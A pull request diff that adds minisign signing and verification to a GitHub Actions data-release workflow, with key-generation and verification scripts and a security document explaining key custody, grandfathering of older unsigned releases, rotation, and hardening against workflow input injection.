### PR TITLE
feat(release): sign data tarballs with minisign (#289)

### DIFF
--- a/.github/workflows/release-data.yml
+++ b/.github/workflows/release-data.yml
@@ -80,6 +80,14 @@ jobs:
         env:
           DATA_SIGNING_KEY: ${{ secrets.DATA_SIGNING_KEY }}
           DATA_SIGNING_KEY_PASSWORD: ${{ secrets.DATA_SIGNING_KEY_PASSWORD }}
+          # Bound through the environment rather than interpolated into the
+          # script body. `inputs.tag` is attacker-influenced (anyone who can
+          # dispatch this workflow), and a `${{ }}` expansion is textual
+          # substitution *before* bash parses the line — so a crafted tag would
+          # execute shell in the one step that holds the signing key. As an env
+          # var it is data, never code.
+          INPUT_TAG: ${{ inputs.tag }}
+          REF_NAME: ${{ github.ref_name }}
         run: |
           set -euo pipefail
 
@@ -107,7 +115,16 @@ jobs:
 
           TARBALL="${ASSET_PATH}"
           SHA256=$(sha256sum "${TARBALL}" | cut -d' ' -f1)
-          TAG="${{ inputs.tag || github.ref_name }}"
+          TAG="${INPUT_TAG:-${REF_NAME}}"
+
+          # The tag ends up inside the signed trusted comment, so constrain it
+          # before signing: a signature is a durable assertion, and asserting
+          # over unvalidated text is how a verifier gets fed something it will
+          # happily parse as a different release.
+          if ! [[ "${TAG}" =~ ^data-[0-9]{4}\.[0-9]+\.[0-9]+$ ]]; then
+            echo "::error::refusing to sign for tag '${TAG}' — expected data-YYYY.MM.MICRO"
+            exit 1
+          fi
 
           # The trusted comment is covered by the signature, so binding version,
           # tag and digest into it makes the signature attest to *which release*

--- a/.github/workflows/release-data.yml
+++ b/.github/workflows/release-data.yml
@@ -39,11 +39,19 @@ jobs:
         with:
           ref: ${{ inputs.tag }}
       - name: Build tarball
+        env:
+          # Bound through the environment, not interpolated into the script
+          # body. This step holds no secrets, but it runs in the same job as
+          # the signing step and can write to $GITHUB_ENV — so an injection
+          # here escalates: prepend a directory to PATH and the signing step
+          # runs an attacker-supplied `minisign` with the key in its
+          # environment. Data, never code (#289).
+          INPUT_TAG: ${{ inputs.tag }}
         run: |
           # Tag form: data-YYYY.MM.MICRO → strip the `data-` prefix to get CalVer.
           # workflow_dispatch passes the tag via inputs.tag; push events via GITHUB_REF.
-          if [ -n "${{ inputs.tag }}" ]; then
-            CALVER="${{ inputs.tag }}"
+          if [ -n "${INPUT_TAG}" ]; then
+            CALVER="${INPUT_TAG}"
             CALVER=${CALVER#data-}
           else
             CALVER=${GITHUB_REF#refs/tags/data-}
@@ -140,13 +148,27 @@ jobs:
           # This is what catches a rotated-but-not-committed key, a corrupted
           # secret, or a swapped signing identity: the release fails here
           # instead of shipping a signature no consumer can verify.
-          PUBKEY=$(grep -v '^untrusted comment:' "${PUBKEY_FILE}" | tr -d '[:space:]')
+          # `|| true` so a comment-only key file reports the diagnosis below
+          # rather than aborting the assignment under `set -o pipefail`.
+          PUBKEY=$( { grep -v '^untrusted comment:' "${PUBKEY_FILE}" || true; } | tr -d '[:space:]')
+          if [ -z "${PUBKEY}" ]; then
+            echo "::error::${PUBKEY_FILE} contains no key line."
+            exit 1
+          fi
           if ! minisign -V -P "${PUBKEY}" -m "${TARBALL}"; then
             echo "::error::The signature does not verify against ${PUBKEY_FILE}." \
                  "The DATA_SIGNING_KEY secret and the committed public key have diverged." \
                  "Follow the rotation runbook in docs/security/data-signing.md."
             exit 1
           fi
+
+          # Cheaper than reasoning about whether action-gh-release treats an
+          # empty line in its `files:` list as unmatched: if the signature is
+          # not on disk here, fail now rather than publish a lone tarball.
+          [ -f "${TARBALL}.minisig" ] || {
+            echo "::error::expected ${TARBALL}.minisig to exist after signing"
+            exit 1
+          }
 
           echo "SIG_PATH=${TARBALL}.minisig" >> "$GITHUB_ENV"
           echo "Signed ${TARBALL} (sha256=${SHA256})"

--- a/.github/workflows/release-data.yml
+++ b/.github/workflows/release-data.yml
@@ -31,8 +31,8 @@ jobs:
     runs-on: ubuntu-latest
     steps:
       - uses: actions/checkout@v5
-      - name: Install zstd
-        run: sudo apt-get update && sudo apt-get install -y zstd
+      - name: Install zstd + minisign
+        run: sudo apt-get update && sudo apt-get install -y zstd minisign
       - name: Checkout tag (workflow_dispatch)
         if: github.event_name == 'workflow_dispatch'
         uses: actions/checkout@v5
@@ -62,11 +62,85 @@ jobs:
           tar --zstd -C data -cf "nucl-parquet-data-${CALVER}.tar.zst" .
           ls -lh "nucl-parquet-data-${CALVER}.tar.zst"
           echo "ASSET_PATH=nucl-parquet-data-${CALVER}.tar.zst" >> "$GITHUB_ENV"
+          echo "CALVER=${CALVER}" >> "$GITHUB_ENV"
+
+      # Sign the tarball with the offline data-signing key (#289).
+      #
+      # A SHA-256 pin says "these are the bytes that build was tested against";
+      # a signature says "these bytes came from the nuclear-data team". Only the
+      # second survives re-pinning, because GitHub's published asset digest is
+      # only as trustworthy as the account — and these releases are mutable.
+      #
+      # Signing is UNCONDITIONAL and hard-fails when the key is absent. The
+      # alternative (skip quietly when the secret is missing) is the exact bug
+      # #283 fixed for the HF mirror: a job that reports green while doing
+      # nothing. An unsigned data release must be impossible, not merely
+      # unusual — consumers that verify would break far more loudly downstream.
+      - name: Sign tarball (minisign)
+        env:
+          DATA_SIGNING_KEY: ${{ secrets.DATA_SIGNING_KEY }}
+          DATA_SIGNING_KEY_PASSWORD: ${{ secrets.DATA_SIGNING_KEY_PASSWORD }}
+        run: |
+          set -euo pipefail
+
+          if [ -z "${DATA_SIGNING_KEY}" ] || [ -z "${DATA_SIGNING_KEY_PASSWORD}" ]; then
+            echo "::error::Data releases must be signed (#289), but DATA_SIGNING_KEY and/or" \
+                 "DATA_SIGNING_KEY_PASSWORD is not set. Generate the keypair offline with" \
+                 "\`just gen-signing-key\` and set both repository secrets. See" \
+                 "docs/security/data-signing.md. Refusing to publish an unsigned release."
+            exit 1
+          fi
+
+          PUBKEY_FILE=docs/security/data-signing-key.pub
+          if [ ! -f "${PUBKEY_FILE}" ]; then
+            echo "::error::${PUBKEY_FILE} is missing. The public key consumers pin must be" \
+                 "committed before a signed release can be published (#289)."
+            exit 1
+          fi
+
+          # Keep key material out of the workspace entirely, so it can never be
+          # swept into a release asset by a glob. RUNNER_TEMP is not archived.
+          umask 077
+          KEYFILE="${RUNNER_TEMP}/data-signing.key"
+          printf '%s\n' "${DATA_SIGNING_KEY}" > "${KEYFILE}"
+          trap 'shred -u "${KEYFILE}" 2>/dev/null || rm -f "${KEYFILE}"' EXIT
+
+          TARBALL="${ASSET_PATH}"
+          SHA256=$(sha256sum "${TARBALL}" | cut -d' ' -f1)
+          TAG="${{ inputs.tag || github.ref_name }}"
+
+          # The trusted comment is covered by the signature, so binding version,
+          # tag and digest into it makes the signature attest to *which release*
+          # these bytes are — not merely that we signed some bytes. A verifier
+          # that reads the trusted comment can detect a valid signature being
+          # replayed onto a different release.
+          TRUSTED_COMMENT="nucl-parquet data ${CALVER} tag=${TAG} sha256=${SHA256}"
+
+          printf '%s\n' "${DATA_SIGNING_KEY_PASSWORD}" \
+            | minisign -S -s "${KEYFILE}" -m "${TARBALL}" -t "${TRUSTED_COMMENT}"
+
+          # Verify against the *committed* public key — the one consumers pin.
+          # This is what catches a rotated-but-not-committed key, a corrupted
+          # secret, or a swapped signing identity: the release fails here
+          # instead of shipping a signature no consumer can verify.
+          PUBKEY=$(grep -v '^untrusted comment:' "${PUBKEY_FILE}" | tr -d '[:space:]')
+          if ! minisign -V -P "${PUBKEY}" -m "${TARBALL}"; then
+            echo "::error::The signature does not verify against ${PUBKEY_FILE}." \
+                 "The DATA_SIGNING_KEY secret and the committed public key have diverged." \
+                 "Follow the rotation runbook in docs/security/data-signing.md."
+            exit 1
+          fi
+
+          echo "SIG_PATH=${TARBALL}.minisig" >> "$GITHUB_ENV"
+          echo "Signed ${TARBALL} (sha256=${SHA256})"
+
       - name: Upload to release
         uses: softprops/action-gh-release@v2
         with:
           tag_name: ${{ inputs.tag || github.ref_name }}
-          files: ${{ env.ASSET_PATH }}
+          files: |
+            ${{ env.ASSET_PATH }}
+            ${{ env.SIG_PATH }}
           fail_on_unmatched_files: true
           generate_release_notes: true
 

--- a/.gitignore
+++ b/.gitignore
@@ -34,5 +34,16 @@ docs/theranostics/*
 !docs/adr/
 !docs/adr/*.md
 !docs/g4-xray-auger-design.md
+# Data-release signing (#289). Allowlisted by name, not as `!docs/security/*`,
+# so a secret key accidentally written into this directory stays ignored and
+# cannot be committed by a stray `git add`.
+!docs/security/
+!docs/security/data-signing.md
+!docs/security/data-signing-key.pub
+
+# Minisign secret key material must never be committed. The public key is
+# allowlisted above by name; everything else stays out.
+*.key
+*.sec
 .direnv/
 .claude/

--- a/README.md
+++ b/README.md
@@ -41,6 +41,17 @@ Data tarballs and code packages release on independent cadences. Data refreshes 
 
 Per-package code semver (split MCP from core, etc.) is tracked in #150.
 
+### Verifying a data release
+
+Data releases from `data-2026.8.2` onward are signed with [minisign](https://jedisct1.github.io/minisign/); the signature ships as `nucl-parquet-data-<CalVer>.tar.zst.minisig` on the GitHub release.
+
+```bash
+just verify-release              # verify the version in data/catalog.json
+just verify-release 2026.8.2     # verify a specific CalVer
+```
+
+The `data_sha256` pin and the signature answer different questions — "are these the bytes that build was tested against?" versus "did these bytes come from the nuclear-data team?". Only the second survives re-pinning, since GitHub's asset digest is only as trustworthy as the account. The public key consumers pin, the grandfathering rule for older unsigned releases, and the rotation runbook are in [docs/security/data-signing.md](docs/security/data-signing.md).
+
 ## Usage
 
 ```python

--- a/docs/security/data-signing.md
+++ b/docs/security/data-signing.md
@@ -96,10 +96,20 @@ Consumers should therefore:
 - fall back to the SHA-256 pin alone for older releases, and treat that as a
   known gap rather than a passing check.
 
-`scripts/verify_data_release.sh` hard-fails on a missing signature and requires
-an explicit `--allow-unsigned` to accept one, so "this release predates signing"
-can never be silently indistinguishable from "an attacker stripped the
-signature".
+`scripts/verify_data_release.sh` enforces this rather than merely documenting
+it. A missing signature hard-fails, and `--allow-unsigned` is **refused at or
+above the cutoff** — it only applies to releases that genuinely predate signing.
+
+That refusal is the point. Without it, an attacker who can strip the `.minisig`
+(a MITM, or anyone able to rewrite these mutable releases) lets the consumer hit
+the "carries no signature" error, and relies on them re-running with the flag
+that error just suggested. If the flag worked at any version, the whole scheme
+would be one retry away from bypass. "This release predates signing" and "an
+attacker stripped the signature" must never be the same code path.
+
+The opt-out warning says plainly that *nothing* was verified — not the origin,
+not the digest. It deliberately does not cite the catalog SHA-256 pin, because
+this script does not check it.
 
 ## Key custody
 

--- a/docs/security/data-signing.md
+++ b/docs/security/data-signing.md
@@ -1,0 +1,196 @@
+# Data-release signing
+
+Every data release from `data-2026.8.2` onward is signed with
+[minisign](https://jedisct1.github.io/minisign/). The signature is published as
+`nucl-parquet-data-<CalVer>.tar.zst.minisig` next to the tarball on the GitHub
+release.
+
+## What this is for
+
+A SHA-256 pin and a signature answer different questions, and consumers need
+both:
+
+| Control | Question it answers | Where it lives |
+|---|---|---|
+| `catalog.json::data_sha256` | Are these the bytes that build was tested against? | this repo |
+| Consumer-side tarball pin | Same, enforced at install time | e.g. HYRR |
+| **minisign signature** | **Did these bytes come from the nuclear-data team?** | **this document's key** |
+
+Only the last one survives re-pinning. When a consumer re-pins to a new data
+release it reads GitHub's published asset digest — but this repo's releases are
+mutable (`immutable: false`), so that digest is a convenience, not a control. A
+signature roots trust in an offline key instead of in the GitHub account, so it
+still means something if the account is compromised.
+
+This is complementary to [#288](https://github.com/exoma-ch/nucl-parquet/issues/288)
+(immutable releases + build attestations), not a substitute:
+
+- **Immutable releases** stop bytes changing after publication — they make the
+  *digest* trustworthy.
+- **Attestations** bind the artifact to the workflow that built it — trust
+  rooted in GitHub.
+- **minisign** binds it to a key the nuclear-data team holds offline — trust
+  rooted in something that survives a GitHub account compromise.
+
+## The public key
+
+The key consumers pin lives at
+[`docs/security/data-signing-key.pub`](./data-signing-key.pub) in this repo. It
+is the single canonical copy: the release workflow verifies its own signature
+against this file before uploading, so a key that has rotated without this file
+being updated fails the release instead of shipping an unverifiable signature.
+
+Pin it by value, not by URL. Fetching the key over the same channel as the
+artifact it authenticates proves nothing.
+
+## Verifying a release
+
+Inside this repo:
+
+```bash
+just verify-release              # verify the version in data/catalog.json
+just verify-release 2026.8.2     # verify a specific CalVer
+```
+
+Standalone, with only `minisign` and the public key:
+
+```bash
+VERSION=2026.8.2
+BASE="https://github.com/exoma-ch/nucl-parquet/releases/download/data-${VERSION}"
+curl -fLO "${BASE}/nucl-parquet-data-${VERSION}.tar.zst"
+curl -fLO "${BASE}/nucl-parquet-data-${VERSION}.tar.zst.minisig"
+minisign -Vm "nucl-parquet-data-${VERSION}.tar.zst" -P "$(tail -1 data-signing-key.pub)"
+```
+
+### Check the trusted comment, not just the exit code
+
+The signature covers a *trusted comment* of the form:
+
+```
+nucl-parquet data 2026.8.2 tag=data-2026.8.2 sha256=<64 hex>
+```
+
+minisign proves the signature covers the bytes you have. It cannot tell you
+that a genuine signature for release A is being served to you as release B —
+downgrading you to an older, authentically-signed release with a known defect.
+Because the trusted comment is covered by the signature and names the version,
+tag and digest, comparing it to the release you *asked for* is what closes that
+gap. `scripts/verify_data_release.sh` does this; a bare `minisign -Vm` does not.
+
+## Grandfathering — releases before signing
+
+Data releases published before `data-2026.8.2` carry **no** `.minisig`, and no
+signature will be issued for them retroactively. Signing an old artifact today
+would assert something the key cannot honestly attest: that we vouched for those
+bytes at the time they were published.
+
+> The cutoff version is defined once, as `FIRST_SIGNED_VERSION` in
+> `scripts/verify_data_release.sh`, and this document is gated against it by
+> `tests/test_data_signing.py`. It names the first release published after
+> signing landed — if that release ships under a different CalVer than planned,
+> change the constant and the test will point here.
+
+Consumers should therefore:
+
+- **require** a valid signature for `>= 2026.8.2`;
+- fall back to the SHA-256 pin alone for older releases, and treat that as a
+  known gap rather than a passing check.
+
+`scripts/verify_data_release.sh` hard-fails on a missing signature and requires
+an explicit `--allow-unsigned` to accept one, so "this release predates signing"
+can never be silently indistinguishable from "an attacker stripped the
+signature".
+
+## Key custody
+
+| Property | Value |
+|---|---|
+| Algorithm | Ed25519 (minisign) |
+| Generated | offline, on a trusted personal machine — never in CI |
+| Secret key | password-protected; master copy in the maintainer's password manager |
+| CI access | `DATA_SIGNING_KEY` + `DATA_SIGNING_KEY_PASSWORD` repository secrets |
+| Distinct from | the HYRR updater key — compromise of one must not imply the other |
+
+The signing key is deliberately **separate** from the HYRR desktop updater key.
+Reusing that key would make a compromise of either trust root a compromise of
+both, at the saving of one rotation-runbook entry.
+
+### Why the key is not sops-encrypted into the repo
+
+This repo is public. sops ciphertext committed here is permanently harvestable —
+every clone, fork and archive keeps a copy forever, so a future compromise of
+the decryption key retroactively exposes every historical version of the signing
+key. A repository secret only leaks to someone with access at the time of the
+leak.
+
+For a revocable API token that trade is fine, and worth making to cut the
+secret-setting toil. For this key it is not: the public key is a **pinned trust
+root**, so rotating it costs a release on every consumer that pinned it, and
+"harvest now, decrypt later" is precisely the threat model signatures exist to
+survive.
+
+### Why the secret in CI is still a real signing key
+
+The pitfall worth naming: a key reachable by a workflow that a pull request can
+influence attests to nothing. `release-data.yml` is triggered only by `data-*`
+tag pushes and by `workflow_dispatch` — there is no `pull_request` trigger, so
+no PR can reach the secret. Key material is written under `RUNNER_TEMP` (never
+the workspace, where an asset glob could sweep it into a release) and shredded
+when the step exits.
+
+## Generating the key (once)
+
+```bash
+just gen-signing-key
+```
+
+Run this on a trusted personal machine, never in CI. It generates the keypair,
+verifies the passphrase actually decrypts it *before* uploading anything, sets
+both repository secrets, and prints the public key line to commit.
+
+Then commit the public key and back up the secret:
+
+```bash
+git add docs/security/data-signing-key.pub
+git commit -m "feat(release): publish the data-signing public key"
+shred -u <path the script printed>
+```
+
+## Rotation
+
+Rotation is expensive by design — every consumer that pinned the old key must
+ship an update before it will accept new releases. Plan it; do not do it
+reflexively.
+
+**Routine rotation (key not believed compromised):**
+
+1. Generate the new keypair offline (`just gen-signing-key`, confirm `rotate`).
+2. Commit the new `data-signing-key.pub`. Open the PR, but **do not merge yet**.
+3. Give consumers a window to ship support for the new key alongside the old
+   one. For HYRR that means a release carrying both keys.
+4. Merge. The next data release is signed with the new key; the workflow's
+   self-verification confirms the committed key matches the secret.
+5. Announce the change on the release notes of the first release signed with it.
+6. Destroy the old secret key only after the window closes.
+
+**Emergency rotation (key compromised):**
+
+1. Rotate immediately — steps 1, 2 and 4 above, no consumer window.
+2. Publish an advisory naming the last release signed with the compromised key.
+   Everything signed after the compromise but before rotation must be treated as
+   untrusted regardless of a valid signature.
+3. Re-release the affected data versions under new CalVer tags signed with the
+   new key. Do not re-sign the old tags in place — a mutable release with a
+   changed signature is indistinguishable from an attack.
+4. Notify consumers that pin the key, HYRR first.
+
+## Related
+
+- [#289](https://github.com/exoma-ch/nucl-parquet/issues/289) — this work
+- [#288](https://github.com/exoma-ch/nucl-parquet/issues/288) — immutable
+  releases + attestations (complementary; cheaper, and reduces the same risk
+  from a different direction)
+- [exoma-ch/hyrr#594](https://github.com/exoma-ch/hyrr/issues/594) — the
+  consumer-side verification this unblocks
+- [exoma-ch/hyrr#577](https://github.com/exoma-ch/hyrr/issues/577) — the
+  SHA-256 pin this complements

--- a/flake.nix
+++ b/flake.nix
@@ -34,6 +34,8 @@
           ruff
           git
           cacert # TLS roots for uv/npm/go/cargo fetches
+          minisign # data-release signing + verification (#289)
+          zstd # unpack data tarballs when verifying a release
         ];
 
         # Only the code needed for the pure `nix flake check` lint — deliberately

--- a/justfile
+++ b/justfile
@@ -17,3 +17,14 @@ dev:
 fmt:
     ruff check --fix nucl_parquet scripts tests
     ruff format nucl_parquet scripts tests
+
+# Verify a published data release's minisign signature (#289).
+# Defaults to data/catalog.json::data_version; pass a CalVer to pick another.
+verify-release version="":
+    ./scripts/verify_data_release.sh {{ version }}
+
+# Generate the data-signing keypair and install it as repo secrets.
+# Run ONCE, on a trusted personal machine — never in CI. See
+# docs/security/data-signing.md before rotating an existing key.
+gen-signing-key:
+    ./scripts/gen_signing_key.sh

--- a/pyproject.toml
+++ b/pyproject.toml
@@ -27,6 +27,10 @@ dev = [
     "jsonschema>=4.0",
     "polars>=1.0",
     "pytest>=8.0",
+    # tests/test_data_signing.py parses the release workflow. Available
+    # transitively today (via huggingface-hub), declared here because the
+    # signing gates must not break when a transitive dep drops it.
+    "pyyaml>=6.0",
     "requests>=2.31",
     "ruff>=0.8",
 ]

--- a/scripts/ci.sh
+++ b/scripts/ci.sh
@@ -53,7 +53,11 @@ uv sync --dev
 # guard) — must run in CI so a data re-release can't ship an inconsistent hash.
 # `-m "not data and not network"` also runs the pure builder/thinning unit tests
 # while skipping the ones that need the full data tree or network.
+# test_data_signing: gates the minisign release-signing path (#289) — that the
+# workflow signs unconditionally, that the signature actually verifies, and that
+# tampering/replay/stripping are all rejected. Needs no data and no network.
 uv run pytest tests/test_loader.py tests/test_data_release.py tests/test_neutron_njoy.py \
+  tests/test_data_signing.py \
   -m "not data and not network" -v
 ok "python tests passed"
 endgroup

--- a/scripts/gen_signing_key.sh
+++ b/scripts/gen_signing_key.sh
@@ -1,0 +1,92 @@
+#!/usr/bin/env bash
+# Generate the nucl-parquet data-signing keypair and install it as repository
+# secrets (#289). Run this ONCE, on a trusted personal machine — never in CI.
+#
+#   just gen-signing-key
+#
+# What it does:
+#   1. Generates a password-protected minisign keypair.
+#   2. Sets DATA_SIGNING_KEY + DATA_SIGNING_KEY_PASSWORD as repo secrets via gh.
+#   3. Writes the public key to docs/security/data-signing-key.pub for you to commit.
+#   4. Leaves the secret key on disk at a path it prints, for you to move into
+#      your password manager — and reminds you to shred it.
+#
+# Why not sops-encrypt the key into the repo? This repo is public: sops
+# ciphertext there is permanently harvestable by every clone, fork and archive,
+# and the signing key is a *pinned trust root* — consumers bake the public key
+# in, so rotating it costs a release on every consumer. A plain repository
+# secret only leaks to someone with access at the time. That trade is worth it
+# for a trust root; it would not be for a revocable API token.
+set -euo pipefail
+
+REPO="${REPO:-exoma-ch/nucl-parquet}"
+ROOT="$(cd "$(dirname "${BASH_SOURCE[0]}")/.." && pwd)"
+PUBKEY_FILE="${ROOT}/docs/security/data-signing-key.pub"
+OUTDIR="${OUTDIR:-$(mktemp -d)}"
+SECKEY="${OUTDIR}/data-signing.key"
+
+die() { echo "error: $*" >&2; exit 1; }
+
+command -v minisign >/dev/null 2>&1 || die "minisign not found (nix develop -c $0)"
+command -v gh >/dev/null 2>&1 || die "gh not found — needed to set repository secrets"
+
+if [ -f "${PUBKEY_FILE}" ]; then
+  echo "WARNING: ${PUBKEY_FILE} already exists."
+  echo "Generating a NEW key rotates the trust root: every consumer that pinned"
+  echo "the old key must ship an update before it will accept new releases."
+  echo "Follow the rotation runbook in docs/security/data-signing.md instead of"
+  echo "overwriting blind."
+  read -r -p "Type 'rotate' to continue: " confirm
+  [ "${confirm}" = "rotate" ] || die "aborted"
+fi
+
+gh auth status >/dev/null 2>&1 || die "gh is not authenticated — run 'gh auth login'"
+
+echo
+echo "Choose a strong passphrase. It protects the offline master copy of the key"
+echo "(the copy you put in your password manager). Store BOTH in the same entry."
+echo
+
+umask 077
+mkdir -p "$(dirname "${PUBKEY_FILE}")"
+minisign -G -p "${PUBKEY_FILE}" -s "${SECKEY}"
+
+echo
+read -r -s -p "Re-enter the passphrase so it can be stored as a repo secret: " PASSPHRASE
+echo
+
+# Fail before touching secrets if the passphrase is wrong — otherwise CI would
+# hold a password that cannot decrypt the key, and the first signed release
+# would be the thing that discovers it.
+TESTFILE="${OUTDIR}/.keycheck"
+echo keycheck > "${TESTFILE}"
+printf '%s\n' "${PASSPHRASE}" | minisign -S -s "${SECKEY}" -m "${TESTFILE}" >/dev/null 2>&1 \
+  || die "that passphrase does not decrypt the key you just generated — nothing was uploaded"
+
+echo "Passphrase verified. Setting repository secrets on ${REPO} ..."
+gh secret set DATA_SIGNING_KEY --repo "${REPO}" < "${SECKEY}"
+printf '%s' "${PASSPHRASE}" | gh secret set DATA_SIGNING_KEY_PASSWORD --repo "${REPO}"
+
+cat <<EOF
+
+================================================================================
+Done. Two things left, both yours:
+
+1. COMMIT the public key:
+       git add ${PUBKEY_FILE#"${ROOT}/"}
+       git commit -m "feat(release): publish the data-signing public key"
+
+   Public key line (this is what consumers pin):
+       $(grep -v '^untrusted comment:' "${PUBKEY_FILE}")
+
+2. BACK UP the secret key, then destroy this copy. It exists in exactly two
+   places right now: the repository secret, and:
+       ${SECKEY}
+
+   Put it in your password manager alongside the passphrase, then:
+       shred -u ${SECKEY}
+
+   If you lose it you cannot sign new releases without rotating the trust
+   root — which costs a release on every consumer that pinned the old key.
+================================================================================
+EOF

--- a/scripts/gen_signing_key.sh
+++ b/scripts/gen_signing_key.sh
@@ -27,6 +27,27 @@ SECKEY="${OUTDIR}/data-signing.key"
 
 die() { echo "error: $*" >&2; exit 1; }
 
+# If the script aborts anywhere after `minisign -G` — a wrong passphrase, a gh
+# failure, Ctrl-C — a freshly generated secret key is sitting in a temp dir at
+# 0600 that nobody has been told about. Shred it on any unsuccessful exit: an
+# abandoned run must not leave an undocumented signing key on the filesystem.
+# On success the key is deliberately kept, because the operator still has to
+# move it into their password manager; the closing message names the path and
+# the shred command.
+COMPLETED=0
+on_exit() {
+  if [ "${COMPLETED}" -eq 0 ] && [ -f "${SECKEY}" ]; then
+    shred -u "${SECKEY}" 2>/dev/null || rm -f "${SECKEY}"
+    echo >&2
+    echo "aborted before completion — the partially-provisioned secret key at" >&2
+    echo "  ${SECKEY}" >&2
+    echo "has been shredded. Nothing was left on disk. Re-run to start over," >&2
+    echo "and check whether either repository secret was already updated:" >&2
+    echo "  gh secret list --repo ${REPO}" >&2
+  fi
+}
+trap on_exit EXIT
+
 command -v minisign >/dev/null 2>&1 || die "minisign not found (nix develop -c $0)"
 command -v gh >/dev/null 2>&1 || die "gh not found — needed to set repository secrets"
 
@@ -79,6 +100,10 @@ printf '%s\n' "${PASSPHRASE}" | minisign -S -s "${SECKEY}" -m "${TESTFILE}" >/de
 echo "Passphrase verified. Setting repository secrets on ${REPO} ..."
 gh secret set DATA_SIGNING_KEY --repo "${REPO}" < "${SECKEY}"
 printf '%s' "${PASSPHRASE}" | gh secret set DATA_SIGNING_KEY_PASSWORD --repo "${REPO}"
+
+# Past this point the run succeeded: the key is provisioned and the operator
+# needs the on-disk copy to back up, so the EXIT trap must stop shredding it.
+COMPLETED=1
 
 cat <<EOF
 

--- a/scripts/gen_signing_key.sh
+++ b/scripts/gen_signing_key.sh
@@ -30,6 +30,7 @@ die() { echo "error: $*" >&2; exit 1; }
 command -v minisign >/dev/null 2>&1 || die "minisign not found (nix develop -c $0)"
 command -v gh >/dev/null 2>&1 || die "gh not found — needed to set repository secrets"
 
+FORCE=""
 if [ -f "${PUBKEY_FILE}" ]; then
   echo "WARNING: ${PUBKEY_FILE} already exists."
   echo "Generating a NEW key rotates the trust root: every consumer that pinned"
@@ -38,6 +39,7 @@ if [ -f "${PUBKEY_FILE}" ]; then
   echo "overwriting blind."
   read -r -p "Type 'rotate' to continue: " confirm
   [ "${confirm}" = "rotate" ] || die "aborted"
+  FORCE="-f"
 fi
 
 gh auth status >/dev/null 2>&1 || die "gh is not authenticated — run 'gh auth login'"
@@ -47,17 +49,28 @@ echo "Choose a strong passphrase. It protects the offline master copy of the key
 echo "(the copy you put in your password manager). Store BOTH in the same entry."
 echo
 
+# Prompt once, here, and feed minisign — rather than letting minisign prompt
+# and then asking again for the copy to upload. Three prompts for the same
+# secret invites a typo that would put a passphrase in CI which cannot decrypt
+# the key, and it breaks entirely when stdin is not a terminal (minisign drains
+# stdin, so the follow-up `read` hits EOF and `set -e` aborts mid-generation,
+# leaving a keypair on disk and nothing uploaded).
+read -r -s -p "Passphrase for the new signing key: " PASSPHRASE
+echo
+read -r -s -p "Confirm passphrase: " PASSPHRASE_CONFIRM
+echo
+[ -n "${PASSPHRASE}" ] || die "empty passphrase — the offline master copy would be unprotected"
+[ "${PASSPHRASE}" = "${PASSPHRASE_CONFIRM}" ] || die "passphrases do not match"
+
 umask 077
 mkdir -p "$(dirname "${PUBKEY_FILE}")"
-minisign -G -p "${PUBKEY_FILE}" -s "${SECKEY}"
+# shellcheck disable=SC2086  # FORCE is intentionally word-split (empty or -f)
+printf '%s\n%s\n' "${PASSPHRASE}" "${PASSPHRASE}" \
+  | minisign -G ${FORCE} -p "${PUBKEY_FILE}" -s "${SECKEY}"
 
-echo
-read -r -s -p "Re-enter the passphrase so it can be stored as a repo secret: " PASSPHRASE
-echo
-
-# Fail before touching secrets if the passphrase is wrong — otherwise CI would
-# hold a password that cannot decrypt the key, and the first signed release
-# would be the thing that discovers it.
+# Prove the passphrase actually decrypts the key before uploading anything.
+# Otherwise CI would hold a password that cannot sign, and the first signed
+# release is what discovers it — after the tag has already been pushed.
 TESTFILE="${OUTDIR}/.keycheck"
 echo keycheck > "${TESTFILE}"
 printf '%s\n' "${PASSPHRASE}" | minisign -S -s "${SECKEY}" -m "${TESTFILE}" >/dev/null 2>&1 \

--- a/scripts/verify_data_release.sh
+++ b/scripts/verify_data_release.sh
@@ -1,0 +1,147 @@
+#!/usr/bin/env bash
+# Verify a published nucl-parquet data release against the project's offline
+# signing key (#289).
+#
+# A SHA-256 pin answers "are these the bytes that build was tested against?".
+# This answers the different question: "did these bytes come from the
+# nuclear-data team?" — which is the one that survives re-pinning, because
+# GitHub's published asset digest is only as trustworthy as the account.
+#
+# Usage:
+#   scripts/verify_data_release.sh                     # verify catalog.json's data_version
+#   scripts/verify_data_release.sh 2026.8.2            # verify a specific CalVer
+#   scripts/verify_data_release.sh --file t.tar.zst \
+#       --sig t.tar.zst.minisig --version 2026.8.2     # verify local files, no network
+#
+# Exits non-zero on any failure. Requires minisign (in the devShell).
+set -euo pipefail
+
+REPO="exoma-ch/nucl-parquet"
+ROOT="$(cd "$(dirname "${BASH_SOURCE[0]}")/.." && pwd)"
+PUBKEY_FILE="${PUBKEY_FILE:-${ROOT}/docs/security/data-signing-key.pub}"
+
+# Grandfathering: data releases published before signing landed carry no
+# .minisig. That is a documented gap, not a verification failure to paper
+# over — see docs/security/data-signing.md. Verifying one of those requires
+# opting out explicitly, so "old release" can never be silently indistinguishable
+# from "signature stripped by an attacker".
+ALLOW_UNSIGNED=0
+
+VERSION=""
+LOCAL_FILE=""
+LOCAL_SIG=""
+
+die() { echo "error: $*" >&2; exit 1; }
+
+while [ $# -gt 0 ]; do
+  case "$1" in
+    --file)            LOCAL_FILE="$2"; shift 2 ;;
+    --sig)             LOCAL_SIG="$2"; shift 2 ;;
+    --version)         VERSION="$2"; shift 2 ;;
+    --pubkey)          PUBKEY_FILE="$2"; shift 2 ;;
+    --allow-unsigned)  ALLOW_UNSIGNED=1; shift ;;
+    -h|--help)         sed -n '2,20p' "${BASH_SOURCE[0]}"; exit 0 ;;
+    -*)                die "unknown flag: $1" ;;
+    *)                 VERSION="$1"; shift ;;
+  esac
+done
+
+command -v minisign >/dev/null 2>&1 \
+  || die "minisign not found. Run inside the devShell: nix develop -c $0"
+
+[ -f "${PUBKEY_FILE}" ] || die "public key not found: ${PUBKEY_FILE}
+The key consumers pin must be committed before releases can be verified (#289).
+See docs/security/data-signing.md."
+
+# minisign -P wants the bare base64 line, not the commented file.
+PUBKEY="$(grep -v '^untrusted comment:' "${PUBKEY_FILE}" | tr -d '[:space:]')"
+[ -n "${PUBKEY}" ] || die "no key line found in ${PUBKEY_FILE}"
+
+if [ -z "${VERSION}" ]; then
+  VERSION="$(jq -r .data_version "${ROOT}/data/catalog.json")"
+  echo "No version given — using data/catalog.json::data_version = ${VERSION}"
+fi
+
+TAG="data-${VERSION}"
+ASSET="nucl-parquet-data-${VERSION}.tar.zst"
+
+WORKDIR=""
